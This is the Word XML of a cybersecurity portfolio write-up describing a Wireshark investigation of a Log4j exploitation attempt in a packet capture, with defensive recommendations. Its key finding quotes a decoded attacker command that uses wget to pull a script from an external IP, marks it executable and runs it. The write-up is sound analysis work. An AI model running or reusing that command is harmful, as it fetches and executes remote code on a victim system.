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Wireshark Log4j Investigation Video</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Short explanation of the investigation shown in the recording</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>What the video shows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">This video demonstrates a basic investigation of suspicious HTTP traffic in Wireshark. The aim is to identify evidence of a possible Log4j exploitation attempt in the packet capture file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>http.pcapng</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Investigation steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>The HTTP POST filter is applied to reduce the traffic and focus on relevant requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Packet 444 is opened and its HTTP details are examined.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>The User-Agent and request content reveal a suspicious JNDI/LDAP pattern linked to Log4j exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>The HTTP stream is followed to view the full malicious request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>A Base64 command is decoded, revealing a command that downloads, gives execution permission to, and runs a script named lh.sh.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Key finding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The decoded command is: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>wget http://62.210.130.250/lh.sh; chmod +x lh.sh; ./lh.sh</w:t>
      </w:r>
      <w:r>
        <w:t>. This would download and execute a potentially malicious script on the affected system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Packet 444 contains evidence of a malicious Log4j exploitation attempt. Recommended actions include isolating the affected server, blocking the identified IP addresses, patching vulnerable Log4j software, searching for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>lh.sh</w:t>
      </w:r>
      <w:r>
        <w:t>, and checking logs to confirm whether the script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Portfolio evidence: Wireshark Log4j investigation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Wireshark Log4j Investigation Video - Short Explanation</dc:title>
  <dc:subject>Cybersecurity portfolio explanation</dc:subject>
  <dc:creator>Lubna Khan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